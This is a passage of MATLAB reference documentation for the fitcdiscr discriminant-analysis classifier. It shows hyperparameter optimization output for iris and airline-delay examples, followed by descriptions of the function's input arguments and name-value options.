Accept | 0.02 | 0.20745 | 0.02 | 0.019776 | 0.00079304 | 0.00011509 | | 19 | Accept | 0.02 | 0.1341 | 0.02 | 0.019678 | 0.007292 | 0.0007911 | | 20 | Accept | 0.046667 | 0.30405 | 0.02 | 0.019785 | 0.0074408 | 0.99945 | |=====================================================================================================| | Iter | Eval | Objective | Objective | BestSoFar | BestSoFar | Delta | Gamma | | | result | | runtime | (observed) | (estim.) | | | |=====================================================================================================| | 21 | Accept | 0.02 | 0.17811 | 0.02 | 0.019043 | 0.0036004 | 0.0024547 | | 22 | Accept | 0.02 | 0.19361 | 0.02 | 0.019755 | 2.5238e-05 | 0.0015542 | | 23 | Accept | 0.02 | 0.35374 | 0.02 | 0.0191 | 1.5478e-05 | 0.0026899 | | 24 | Accept | 0.02 | 0.29655 | 0.02 | 0.019081 | 0.0040557 | 0.00046815 | | 25 | Accept | 0.02 | 0.24127 | 0.02 | 0.019333 | 2.959e-05 | 0.0011358 | | 26 | Accept | 0.02 | 0.3227 | 0.02 | 0.019369 | 2.3111e-06 | 0.0029205 | | 27 | Accept | 0.02 | 0.21419 | 0.02 | 0.019455 | 3.8898e-05 | 0.0011665 | | 28 | Accept | 0.02 | 0.13446 | 0.02 | 0.019449 | 0.0035925 | 0.0020278 | | 29 | Accept | 0.66667 | 0.21061 | 0.02 | 0.019479 | 998.93 | 0.064276 | | 30 | Accept | 0.02 | 0.36249 | 0.02 | 0.01947 | 8.1557e-06 | 0.0008004 | __________________________________________________________ Optimization completed. MaxObjectiveEvaluations of 30 reached. Total function evaluations: 30 Total elapsed time: 83.0276 seconds. Total objective function evaluation time: 9.9662 Best observed feasible point: Delta Gamma __________ ________ 2.7404e-05 0.073264 Observed objective function value = 0.02 Estimated objective function value = 0.01947 Function evaluation time = 0.51226 Best estimated feasible point (according to models): Delta Gamma __________ _________ 2.5238e-05 0.0015542 Estimated objective function value = 0.01947 Estimated function evaluation time = 0.25472 ```\n```Mdl = ClassificationDiscriminant ResponseName: 'Y' CategoricalPredictors: [] ClassNames: {'setosa' 'versicolor' 'virginica'} ScoreTransform: 'none' NumObservations: 150 HyperparameterOptimizationResults: [1x1 BayesianOptimization] DiscrimType: 'linear' Mu: [3x4 double] Coeffs: [3x3 struct] Properties, Methods ```\n\nThe fit achieved about 2% loss for the default 5-fold cross validation.\n\nThis example shows how to optimize hyperparameters of a discriminant analysis model automatically using a tall array. The sample data set `airlinesmall.csv` is a large data set that contains a tabular file of airline flight data. This example creates a tall table containing the data and uses it to run the optimization procedure.\n\nWhen you perform calculations on tall arrays, MATLAB® uses either a parallel pool (default if you have Parallel Computing Toolbox™) or the local MATLAB session. If you want to run the example using the local MATLAB session when you have Parallel Computing Toolbox, you can change the global execution environment by using the `mapreducer` function.\n\nCreate a datastore that references the folder location with the data. Select a subset of the variables to work with, and treat `'NA'` values as missing data so that `datastore` replaces them with `NaN` values. Create a tall table that contains the data in the datastore.\n\n```ds = datastore('airlinesmall.csv'); ds.SelectedVariableNames = {'Month','DayofMonth','DayOfWeek',... 'DepTime','ArrDelay','Distance','DepDelay'}; ds.TreatAsMissing = 'NA'; tt = tall(ds) % Tall table```\n```Starting parallel pool (parpool) using the 'local' profile ... Connected to the parallel pool (number of workers: 6). tt = M×7 tall table Month DayofMonth DayOfWeek DepTime ArrDelay Distance DepDelay _____ __________ _________ _______ ________ ________ ________ 10 21 3 642 8 308 12 10 26 1 1021 8 296 1 10 23 5 2055 21 480 20 10 23 5 1332 13 296 12 10 22 4 629 4 373 -1 10 28 3 1446 59 308 63 10 8 4 928 3 447 -2 10 10 6 859 11 954 -1 : : : : : : : : : : : : : : ```\n\nDetermine the flights that are late by 10 minutes or more by defining a logical variable that is true for a late flight. This variable contains the class labels. A preview of this variable includes the first few rows.\n\n`Y = tt.DepDelay > 10 % Class labels`\n```Y = M×1 tall logical array 1 0 1 1 0 1 0 0 : : ```\n\nCreate a tall array for the predictor data.\n\n`X = tt{:,1:end-1} % Predictor data`\n```X = M×6 tall double matrix Columns 1 through 4 10 21 3 642 10 26 1 1021 10 23 5 2055 10 23 5 1332 10 22 4 629 10 28 3 1446 10 8 4 928 10 10 6 859 : : : : : : : : Columns 5 through 6 8 308 8 296 21 480 13 296 4 373 59 308 3 447 11 954 : : : : ```\n\nRemove rows in `X` and `Y` that contain missing data.\n\n```R = rmmissing([X Y]); % Data with missing entries removed X = R(:,1:end-1); Y = R(:,end); ```\n\nStandardize the predictor variables.\n\n`Z = zscore(X);`\n\nOptimize hyperparameters automatically using the `'OptimizeHyperparameters'` name-value pair argument. Find the optimal `'DiscrimType'` value that minimizes holdout cross-validation loss. (Specifying `'auto'` uses `'DiscrimType'`.) For reproducibility, use the `'expected-improvement-plus'` acquisition function and set the seeds of the random number generators using `rng` and `tallrng`. The results can vary depending on the number of workers and the execution environment for the tall arrays. For details, see Control Where Your Code Runs (MATLAB).\n\n```rng('default') tallrng('default') [Mdl,FitInfo,HyperparameterOptimizationResults] = fitcdiscr(Z,Y,... 'OptimizeHyperparameters','auto',... 'HyperparameterOptimizationOptions',struct('Holdout',0.3,... 'AcquisitionFunctionName','expected-improvement-plus'))```", null, "", null, "```Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 2: Completed in 5.8 sec - Pass 2 of 2: Completed in 5.1 sec Evaluation completed in 17 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 2.7 sec Evaluation completed in 2.8 sec |======================================================================================| | Iter | Eval | Objective | Objective | BestSoFar | BestSoFar | DiscrimType | | | result | | runtime | (observed) | (estim.) | | |======================================================================================| | 1 | Best | 0.11354 | 27.911 | 0.11354 | 0.11354 | quadratic | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.4 sec Evaluation completed in 2.7 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.3 sec | 2 | Accept | 0.11354 | 9.1078 | 0.11354 | 0.11354 | pseudoQuadra | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 2.5 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.7 sec Evaluation completed in 1.7 sec | 3 | Accept | 0.12869 | 9.0635 | 0.11354 | 0.11859 | pseudoLinear | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.3 sec Evaluation completed in 2.1 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.2 sec | 4 | Accept | 0.12745 | 8.1875 | 0.11354 | 0.1208 | diagLinear | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 2.1 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.2 sec | 5 | Accept | 0.12869 | 8.1795 | 0.11354 | 0.12238 | linear | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.2 sec | 6 | Best | 0.11301 | 7.3598 | 0.11301 | 0.12082 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 2.6 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.2 sec | 7 | Accept | 0.11301 | 8.1574 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.6 sec Evaluation completed in 1.7 sec | 8 | Accept | 0.11301 | 7.8032 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.8 sec Evaluation completed in 2.6 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.2 sec | 9 | Accept | 0.11301 | 8.2363 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 2 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 10 | Accept | 0.11301 | 7.3819 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 11 | Accept | 0.11301 | 7.0881 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 12 | Accept | 0.11301 | 6.9635 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 13 | Accept | 0.11301 | 6.9543 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.7 sec Evaluation completed in 2.5 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.7 sec Evaluation completed in 1.7 sec | 14 | Accept | 0.11301 | 8.415 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 15 | Accept | 0.11301 | 6.9447 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 16 | Accept | 0.11301 | 6.968 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 2 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 17 | Accept | 0.11301 | 7.2919 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 18 | Accept | 0.11301 | 7.0682 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.7 sec Evaluation completed in 2.5 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 19 | Accept | 0.11301 | 7.8015 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1 sec Evaluation completed in 1.1 sec | 20 | Accept | 0.11301 | 6.9002 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec |======================================================================================| | Iter | Eval | Objective | Objective | BestSoFar | BestSoFar | DiscrimType | | | result | | runtime | (observed) | (estim.) | | |======================================================================================| | 21 | Accept | 0.11301 | 6.9957 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 22 | Accept | 0.11301 | 6.9259 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 23 | Accept | 0.11354 | 7.0707 | 0.11301 | 0.11301 | quadratic | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.8 sec Evaluation completed in 2.5 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1 sec Evaluation completed in 1.1 sec | 24 | Accept | 0.11354 | 7.5755 | 0.11301 | 0.11301 | pseudoQuadra | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.2 sec | 25 | Accept | 0.11301 | 6.9713 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.6 sec Evaluation completed in 1.6 sec | 26 | Accept | 0.11354 | 7.4111 | 0.11301 | 0.11301 | quadratic | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 27 | Accept | 0.11301 | 6.9108 | 0.11301 | 0.11301 | diagQuadrati | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.8 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1 sec Evaluation completed in 1.1 sec | 28 | Accept | 0.11354 | 6.712 | 0.11301 | 0.11301 | pseudoQuadra | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.7 sec Evaluation completed in 2.3 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 29 | Accept | 0.11354 | 7.3625 | 0.11301 | 0.11301 | quadratic | Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.2 sec Evaluation completed in 1.9 sec Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1.1 sec Evaluation completed in 1.1 sec | 30 | Accept | 0.11354 | 6.9669 | 0.11301 | 0.11301 | quadratic | __________________________________________________________ Optimization completed. MaxObjectiveEvaluations of 30 reached. Total function evaluations: 30 Total elapsed time: 286.0737 seconds. Total objective function evaluation time: 244.685 Best observed feasible point: DiscrimType _____________ diagQuadratic Observed objective function value = 0.11301 Estimated objective function value = 0.11301 Function evaluation time = 7.3598 Best estimated feasible point (according to models): DiscrimType _____________ diagQuadratic Estimated objective function value = 0.11301 Estimated function evaluation time = 7.6251 Evaluating tall expression using the Parallel Pool 'local': - Pass 1 of 1: Completed in 1 sec Evaluation completed in 1.7 sec ```\n```Mdl = classreg.learning.classif.CompactClassificationDiscriminant PredictorNames: {'x1' 'x2' 'x3' 'x4' 'x5' 'x6'} ResponseName: 'Y' CategoricalPredictors: [] ClassNames: [0 1] ScoreTransform: 'none' DiscrimType: 'diagQuadratic' Mu: [2×6 double] Coeffs: [2×2 struct] Properties, Methods ```\n```FitInfo = struct with no fields. ```\n```HyperparameterOptimizationResults = BayesianOptimization with properties: ObjectiveFcn: @createObjFcn/tallObjFcn VariableDescriptions: [1×1 optimizableVariable] Options: [1×1 struct] MinObjective: 0.1130 XAtMinObjective: [1×1 table] MinEstimatedObjective: 0.1130 XAtMinEstimatedObjective: [1×1 table] NumObjectiveEvaluations: 30 TotalElapsedTime: 286.0737 NextPoint: [1×1 table] XTrace: [30×1 table] ObjectiveTrace: [30×1 double] ConstraintsTrace: [] UserDataTrace: {30×1 cell} ObjectiveEvaluationTimeTrace: [30×1 double] IterationTimeTrace: [30×1 double] ErrorTrace: [30×1 double] FeasibilityTrace: [30×1 logical] FeasibilityProbabilityTrace: [30×1 double] IndexOfMinimumTrace: [30×1 double] ObjectiveMinimumTrace: [30×1 double] EstimatedObjectiveMinimumTrace: [30×1 double] ```\n\n## Input Arguments\n\ncollapse all\n\nSample data used to train the model, specified as a table. Each row of `Tbl` corresponds to one observation, and each column corresponds to one predictor variable. Optionally, `Tbl` can contain one additional column for the response variable. Multicolumn variables and cell arrays other than cell arrays of character vectors are not allowed.\n\nIf `Tbl` contains the response variable, and you want to use all remaining variables in `Tbl` as predictors, then specify the response variable by using `ResponseVarName`.\n\nIf `Tbl` contains the response variable, and you want to use only a subset of the remaining variables in `Tbl` as predictors, then specify a formula by using `formula`.\n\nIf `Tbl` does not contain the response variable, then specify a response variable by using `Y`. The length of the response variable and the number of rows in `Tbl` must be equal.\n\nData Types: `table`\n\nResponse variable name, specified as the name of a variable in `Tbl`.\n\nYou must specify `ResponseVarName` as a character vector or string scalar. For example, if the response variable `Y` is stored as `Tbl.Y`, then specify it as `'Y'`. Otherwise, the software treats all columns of `Tbl`, including `Y`, as predictors when training the model.\n\nThe response variable must be a categorical, character, or string array, logical or numeric vector, or cell array of character vectors. If `Y` is a character array, then each element of the response variable must correspond to one row of the array.\n\nIt is a good practice to specify the order of the classes by using the `ClassNames` name-value pair argument.\n\nData Types: `char` | `string`\n\nExplanatory model of the response variable and a subset of the predictor variables, specified as a character vector or string scalar in the form `'Y~X1+X2+X3'`. In this form, `Y` represents the response variable, and `X1`, `X2`, and `X3` represent the predictor variables.\n\nTo specify a subset of variables in `Tbl` as predictors for training the model, use a formula. If you specify a formula, then the software does not use any variables in `Tbl` that do not appear in `formula`.\n\nThe variable names in the formula must be both variable names in `Tbl` (`Tbl.Properties.VariableNames`) and valid MATLAB® identifiers.\n\nYou can verify the variable names in `Tbl` by using the `isvarname` function. The following code returns logical `1` (`true`) for each variable that has a valid variable name.\n\n`cellfun(@isvarname,Tbl.Properties.VariableNames)`\nIf the variable names in `Tbl` are not valid, then convert them by using the `matlab.lang.makeValidName` function.\n`Tbl.Properties.VariableNames = matlab.lang.makeValidName(Tbl.Properties.VariableNames);`\n\nData Types: `char` | `string`\n\nClass labels, specified as a categorical, character, or string array, a logical or numeric vector, or a cell array of character vectors. Each row of `Y` represents the classification of the corresponding row of `X`.\n\nThe software considers `NaN`, `''` (empty character vector), `\"\"` (empty string), `<missing>`, and `<undefined>` values in `Y` to be missing values. Consequently, the software does not train using observations with a missing response.\n\nData Types: `categorical` | `char` | `string` | `logical` | `single` | `double` | `cell`\n\nPredictor values, specified as a numeric matrix. Each column of `X` represents one variable, and each row represents one observation.\n\n`fitcdiscr` considers `NaN` values in `X` as missing values. `fitcdiscr` does not use observations with missing values for `X` in the fit.\n\nData Types: `single` | `double`\n\n### Name-Value Pair Arguments\n\nSpecify optional comma-separated pairs of `Name,Value` arguments. `Name` is the argument name and `Value` is the corresponding value. `Name` must appear inside quotes. You can specify several name and value pair arguments in any order as `Name1,Value1,...,NameN,ValueN`.\n\nExample: `'DiscrimType','quadratic','SaveMemory','on'` specifies a quadratic discriminant classifier and does not store the covariance matrix in the output object.\n\n### Note\n\nYou cannot use any cross-validation name-value pair argument along with the `'OptimizeHyperparameters'` name-value pair argument. You can modify the cross-validation for `'OptimizeHyperparameters'` only by using the `'HyperparameterOptimizationOptions'` name-value pair argument.\n\n#### Model Parameters\n\ncollapse all\n\nNames of classes to use for training, specified as the comma-separated pair consisting of `'ClassNames'` and a categorical, character, or string array, a logical or numeric vector, or a cell array of character vectors. `ClassNames` must have the same data type as `Y`.\n\nIf `ClassNames` is a character array, then each element must correspond to one row of the array.\n\nUse `ClassNames` to:\n\n• Order the classes during training.\n\n• Specify the order of any input or output argument dimension that corresponds to the class order. For example, use `ClassNames` to specify the order of the dimensions of `Cost` or the column order of classification scores returned by `predict`.\n\n• Select a subset of classes for training. For example, suppose that the set of all distinct class names in `Y` is `{'a','b','c'}`. To train the model using observations from classes `'a'` and `'c'` only, specify `'ClassNames',{'a','c'}`.\n\nThe default value for `ClassNames` is the set of all distinct class names in `Y`.\n\nExample: `'ClassNames',{'b','g'}`\n\nData Types: `categorical` | `char` | `string` | `logical` | `single` | `double` | `cell`\n\nCost of misclassification of a point, specified as the comma-separated pair consisting of `'Cost'` and one of the following:\n\n• Square matrix, where `Cost(i,j)` is the cost of classifying a point into class `j` if its true class is `i` (i.e., the rows correspond to the true class and the columns correspond to the predicted class). To specify the class order for the corresponding rows and columns of `Cost`, additionally specify the `ClassNames` name-value pair argument.\n\n• Structure `S` having two fields: `S.ClassNames` containing the group names as a variable of the same type as `Y`, and `S.ClassificationCosts` containing the cost matrix.\n\nThe default is `Cost(i,j)=1` if `i~=j`, and `Cost(i,j)=0` if `i=j`.\n\nData Types: `single` | `double` | `struct`\n\nLinear coefficient threshold, specified as the comma-separated pair consisting of `'Delta'` and a nonnegative scalar value. If a coefficient of `Mdl` has magnitude smaller than `Delta`, `Mdl` sets this coefficient to `0`, and you can eliminate the corresponding predictor from the model. Set `Delta` to a higher value to eliminate more predictors.\n\n`Delta` must be `0` for quadratic discriminant models.\n\nData Types: `single` | `double`\n\nDiscriminant type, specified as the comma-separated pair consisting of `'DiscrimType'` and a character vector or string scalar in this table.\n\nValueDescriptionPredictor Covariance Treatment\n`'linear'`Regularized linear discriminant analysis (LDA)\n• All classes have the same covariance matrix.\n\n• `${\\stackrel{^}{\\Sigma }}_{\\gamma }=\\left(1-\\gamma \\right)\\stackrel{^}{\\Sigma }+\\gamma \\text{diag}\\left(\\stackrel{^}{\\Sigma }\\right).$`\n\n$\\stackrel{^}{\\Sigma }$ is the empirical, pooled covariance matrix and γ is the amount of regularization.\n\n`'diaglinear'`LDAAll classes have the same, diagonal covariance matrix.\n`'pseudolinear'`LDAAll classes have the same covariance matrix. The software inverts the covariance matrix using the pseudo inverse.\n`'quadratic'`Quadratic discriminant analysis (QDA)The covariance matrices can vary among classes.\n`'diagquadratic'`QDAThe covariance matrices are diagonal and can vary among classes.\n`'pseudoquadratic'`QDAThe covariance matrices can vary among classes. The software inverts the covariance matrix using the pseudo inverse.\n\n### Note\n\nTo use regularization, you must specify `'linear'`. To specify the amount of regularization, use the `Gamma` name-value pair argument.\n\nExample: `'DiscrimType','quadratic'`\n\n`Coeffs` property flag, specified as the comma-separated pair consisting of `'FillCoeffs'` and `'on'` or `'off'`. Setting the flag to `'on'` populates the `Coeffs` property in the classifier object. This can be computationally intensive, especially when cross-validating. The default is `'on'`, unless you specify a cross-validation name-value pair, in which case the flag is set to `'off'` by default.\n\nExample: `'FillCoeffs','off'`\n\nAmount of regularization to apply when estimating the covariance matrix of the predictors, specified as the comma-separated pair consisting of `'Gamma'` and a scalar value in the interval [0,1]. `Gamma` provides finer control over the covariance matrix structure than `DiscrimType`.\n\n• If you specify `0`, then the software does not use regularization to adjust the covariance matrix. That is, the software estimates and uses the unrestricted, empirical covariance matrix.\n\n• For linear discriminant analysis, if the empirical covariance matrix is singular, then the software automatically applies the minimal regularization required to invert the covariance matrix. You can display the chosen regularization amount by entering `Mdl.Gamma` at the command line.\n\n• For quadratic discriminant analysis, if at least one class has an empirical covariance matrix that is singular, then the software throws an error.\n\n• If you specify a value in the interval (0,1), then you must implement linear discriminant analysis, otherwise the software throws an error. Consequently, the software sets `DiscrimType` to `'linear'`.\n\n• If you specify `1`, then the software uses maximum regularization for covariance matrix estimation. That is, the software restricts the covariance matrix to be diagonal. Alternatively, you can set `DiscrimType` to `'diagLinear'` or `'diagQuadratic'` for diagonal covariance matrices.\n\nExample: `'Gamma',1`\n\nData Types: `single` | `double`\n\nPredictor variable names, specified as the comma-separated pair consisting of `'PredictorNames'` and a string array of unique names or cell array of unique character vectors. The functionality of `'PredictorNames'` depends on the way you supply the training data.\n\n• If you supply `X` and `Y`, then you can use `'PredictorNames'` to give the predictor variables in `X` names.\n\n• The order of the names in `PredictorNames` must correspond to the column order of `X`. That is, `PredictorNames{1}` is the name of `X(:,1)`, `PredictorNames{2}` is the name of `X(:,2)`, and so on. Also, `size(X,2)` and `numel(PredictorNames)` must be equal.\n\n• By default, `PredictorNames` is `{'x1','x2',...}`.\n\n• If you supply `Tbl`, then you can use `'PredictorNames'` to choose which predictor variables to use in training. That is, `fitcdiscr` uses only the predictor variables in `PredictorNames` and the response variable in training.\n\n• `PredictorNames` must be a subset of `Tbl.Properties.VariableNames` and cannot include the name of the response variable.\n\n• By default, `PredictorNames` contains the names of all predictor variables.\n\n• It is a good practice to specify the predictors for training using either `'PredictorNames'` or `formula` only.\n\nExample: `'PredictorNames',{'SepalLength','SepalWidth','PetalLength','PetalWidth'}`\n\nData Types: `string` | `cell`\n\nPrior probabilities for each class, specified as the comma-separated pair consisting of `'Prior'` and a value in this table.\n\nValueDescription\n`'empirical'`The class prior probabilities are the class relative frequencies in `Y`.\n`'uniform'`All class prior probabilities are equal to 1/K, where K is the number of classes.\nnumeric vectorEach element is a class prior probability. Order the elements according to `Mdl``.ClassNames` or specify the order using the `ClassNames` name-value pair argument. The software normalizes the elements such that they sum to `1`.\nstructure\n\nA structure `S` with two fields:\n\n• `S.ClassNames` contains the class names as a variable of the same type as `Y`.\n\n• `S.ClassProbs` contains a vector of corresponding prior probabilities. The software normalizes the elements such that they sum to `1`.\n\nIf you set values for both `Weights` and `Prior`, the weights are renormalized to add up to the value of the prior probability in the respective class.\n\nExample: `'Prior','uniform'`\n\nData Types: `char` | `string` | `single` | `double` | `struct`\n\nResponse variable name, specified as the comma-separated pair consisting of `'ResponseName'` and a character vector or string scalar.\n\nExample: `'ResponseName','response'`\n\nData Types: `char` | `string`\n\nFlag to save covariance matrix, specified as the comma-separated pair consisting of `'SaveMemory'` and either `'on'` or `'off'`. If you specify `'on'`, then `fitcdiscr` does not store the full covariance matrix, but instead stores enough information to compute the matrix. The `predict` method computes the full covariance matrix for prediction, and does not store the matrix. If you specify `'off'`, then `fitcdiscr` computes and stores the full covariance matrix in `Mdl`.\n\nSpecify `SaveMemory` as `'on'` when the input matrix contains thousands of predictors.\n\nExample: `'SaveMemory','on'`\n\nScore transformation, specified as the comma-separated pair consisting of `'ScoreTransform'` and a character vector, string scalar, or function handle.\n\nThis table summarizes the available character vectors and string scalars.\n\nValueDescription\n`'doublelogit'`1/(1 + e–2x)\n`'invlogit'`log(x / (1 – x))\n`'ismax'`Sets the score for the class with the largest score to `1`, and sets the scores for all other classes to `0`\n`'logit'`1/(1 + ex)\n`'none'` or `'identity'`x (no transformation)\n`'sign'`–1 for x < 0\n0 for x = 0\n1 for x > 0\n`'symmetric'`2x – 1\n`'symmetricismax'`Sets the score for the class with the largest score to `1`, and sets the scores for all other classes to `–1`\n`'symmetriclogit'`2/(1 + ex) – 1\n\nFor a MATLAB function or a function you define, use its function handle for score transform. The function handle must accept a matrix (the original scores) and return a matrix of the same size (the transformed scores).\n\nExample: `'ScoreTransform','logit'`\n\nData Types: `char` | `string` | `function_handle`\n\nObservation weights, specified as the comma-separated pair consisting of `'Weights'` and a numeric vector of positive values or name of a variable in `Tbl`. The software weighs the observations in each row of `X` or `Tbl` with the corresponding value in `Weights`. The size of `Weights` must equal the number of rows of `X` or `Tbl`.\n\nIf you specify the input data as a table `Tbl`, then `Weights` can be the name of a variable in `Tbl` that contains a numeric vector. In this case, you must specify `Weights` as a character vector or string scalar. For example, if the weights vector `W` is stored as `Tbl.W`, then specify it as `'W'`. Otherwise, the software treats all columns of `Tbl`, including `W`, as predictors or the response when training the model.\n\nThe software normalizes `Weights` to sum up to the value of the prior probability in the respective class.\n\nBy default, `Weights` is `ones(n,1)`, where `n` is the number of observations in `X` or `Tbl`.\n\nData Types: `double` | `single` | `char` | `string`\n\n#### Cross-Validation Options\n\ncollapse all\n\nCross-validation flag, specified as the comma-separated pair consisting of `'Crossval'` and `'on'` or `'off'`.\n\nIf you specify `'on'`, then the software implements 10-fold cross-validation.\n\nTo override this cross-validation setting, use one of these name-value pair arguments: `CVPartition`, `Holdout`, `KFold`, or `Leaveout`. To create a cross-validated model, you can use one cross-validation name-value pair argument at a time only.\n\nAlternatively, cross-validate later by passing `Mdl` to `crossval`.\n\nExample: `'CrossVal','on'`\n\nCross-validation partition, specified as the comma-separated pair consisting of `'CVPartition'` and a `cvpartition` partition object created by `cvpartition`. The partition object specifies the type of cross-validation and the indexing for the training and validation sets.\n\nTo create a cross-validated model, you can use one of these four name-value pair arguments only: `CVPartition`, `Holdout`, `KFold`, or `Leaveout`.\n\nExample: Suppose you create a random partition for 5-fold cross-validation on 500 observations by using `cvp = cvpartition(500,'KFold',5)`. Then, you can specify the cross-validated model by using `'CVPartition',cvp`.\n\nFraction of the data used for holdout validation, specified as the comma-separated pair consisting of `'Holdout'` and a scalar value in the range (0,1). If you specify `'Holdout',p`, then the software completes these steps:\n\n1. Randomly select and reserve `p*100`% of the data as validation data, and train the model using the rest of the data.\n\n2. Store the compact, trained model in the `Trained` property of the cross-validated model.\n\nTo create a cross-validated model, you can use one of these four name-value pair arguments only: `CVPartition`, `Holdout`, `KFold`, or 